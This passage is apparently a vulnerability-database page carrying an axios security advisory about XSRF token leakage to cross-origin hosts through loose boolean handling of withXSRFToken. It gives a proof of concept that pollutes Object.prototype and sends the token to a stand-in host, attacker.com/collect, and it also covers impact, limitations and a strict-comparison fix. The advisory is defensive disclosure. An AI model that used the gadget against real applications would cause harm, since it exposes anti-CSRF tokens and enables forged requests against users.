cookies.read(xsrfCookieName);\n  if (xsrfValue) {\n    headers.set(xsrfHeaderName, xsrfValue);\n  }\n}\n```\n\n**Designed behavior:**\n- `true` \u2192 always send token (explicit cross-origin opt-in)\n- `false` \u2192 never send token\n- `undefined` \u2192 send only for same-origin requests\n\n**Actual behavior for non-boolean truthy values (`1`, `\"false\"`, `{}`, `[]`):**\n- All treated as truthy \u2192 same-origin check skipped \u2192 token sent everywhere\n\n## Proof of Concept\n\n```javascript\n// Simulated prototype pollution from any vulnerable dependency\nObject.prototype.withXSRFToken = 1;\n\n// In browser with document.cookie = \"XSRF-TOKEN=secret-csrf-token-abc123\"\n// Every axios request now includes: X-XSRF-TOKEN: secret-csrf-token-abc123\n// Even to cross-origin hosts:\nawait axios.get(\u0027https://attacker.com/collect\u0027);\n// \u2192 attacker receives the XSRF token in request headers\n```\n\n## Verified PoC Output\n\n```\nwithXSRFToken Value        Sends Token Cross-Origin  Expected\ntrue (boolean)             YES                       Yes (opt-in)\nfalse (boolean)            No                        No\nundefined (default)        No                        No\n1 (number)                 YES \u2190 BUG                No\n\"false\" (string)           YES \u2190 BUG                No\n{} (object)                YES \u2190 BUG                No\n[] (array)                 YES \u2190 BUG                No\n\nPrototype pollution:\n  Object.prototype.withXSRFToken = 1\n  config.withXSRFToken = 1 \u2192 leaks=true\n  isURLSameOrigin() was NOT called (short-circuited)\n```\n\n## Impact Analysis\n\n- **XSRF Token Theft:** Anti-CSRF token sent as header to attacker-controlled server, enabling CSRF attacks against the victim application\n- **Universal Scope:** A single `Object.prototype.withXSRFToken = 1` affects every axios request in the application\n- **Misconfiguration Risk:** Developer writing `withXSRFToken: \"false\"` (string) instead of `false` (boolean) triggers the same issue without PP\n\n**Limitations:**\n- Browser-only (XSRF logic runs only in `hasStandardBrowserEnv`)\n- XSRF tokens are anti-CSRF tokens, not session tokens \u2014 leakage enables CSRF but not direct session hijacking\n- Attacker still needs a way to deliver the forged request after obtaining the token\n\n## Recommended Fix\n\nUse strict boolean comparison:\n\n```javascript\n// FIXED: lib/helpers/resolveConfig.js\nconst shouldSendXSRF = withXSRFToken === true ||\n  (withXSRFToken == null \u0026\u0026 isURLSameOrigin(newConfig.url));\n\nif (shouldSendXSRF) {\n  const xsrfValue = xsrfHeaderName \u0026\u0026 xsrfCookieName \u0026\u0026 cookies.read(xsrfCookieName);\n  if (xsrfValue) {\n    headers.set(xsrfHeaderName, xsrfValue);\n  }\n}\n```\n\n## Resources\n\n- [CWE-201: Insertion of Sensitive Information Into Sent Data](https://cwe.mitre.org/data/definitions/201.html)\n- [CWE-183: Permissive List of Allowed Inputs](https://cwe.mitre.org/data/definitions/183.html)\n- [GHSA-fvcv-3m26-pcqx: Related PP Gadget in Axios](https://github.com/advisories/GHSA-fvcv-3m26-pcqx)\n- [Axios GitHub Repository](https://github.com/axios/axios)\n\n## Timeline\n\n| Date | Event |\n|---|---|\n| 2026-04-15 | Vulnerability discovered during source code audit |\n| 2026-04-16 | Report revised: corrected CVSS, documented limitations |\n| TBD | Report submitted to vendor via GitHub Security Advisory |",
  "id": "GHSA-xx6v-rp6x-q39c",
  "modified": "2026-05-05T00:25:22Z",
  "published": "2026-05-05T00:25:22Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/axios/axios/security/advisories/GHSA-xx6v-rp6x-q39c"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42042"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/axios/axios"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Axios: XSRF Token Cross-Origin Leakage via Prototype Pollution Gadget in `withXSRFToken` Boolean Coercion"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

Vulnerability from cleanstart

GHSA-XJPJ-3MR7-GCPF

Summary

Description

1. Template name injection

2. Namespace injection (-n / --namespace)

3. CommonJS path injection (-c / --commonjs)

4. AMD path injection (-h / --handlebarPath)

Proof of Concept

Workarounds

GHSA-XPCF-PG52-R92G

Summary

Details

Impact

GHSA-XX6V-RP6X-Q39C

Vulnerability Disclosure: XSRF Token Cross-Origin Leakage via Prototype Pollution Gadget in withXSRFToken Boolean Coercion

Summary

CWE

CVSS 3.1

Usage of "Helper" Vulnerabilities

Vulnerable Code

Proof of Concept

Verified PoC Output

Impact Analysis

Recommended Fix

Resources

Timeline

Tags

Sightings

Nomenclature

2. Namespace injection (`-n` / `--namespace`)

3. CommonJS path injection (`-c` / `--commonjs`)

4. AMD path injection (`-h` / `--handlebarPath`)

Vulnerability Disclosure: XSRF Token Cross-Origin Leakage via Prototype Pollution Gadget in `withXSRFToken` Boolean Coercion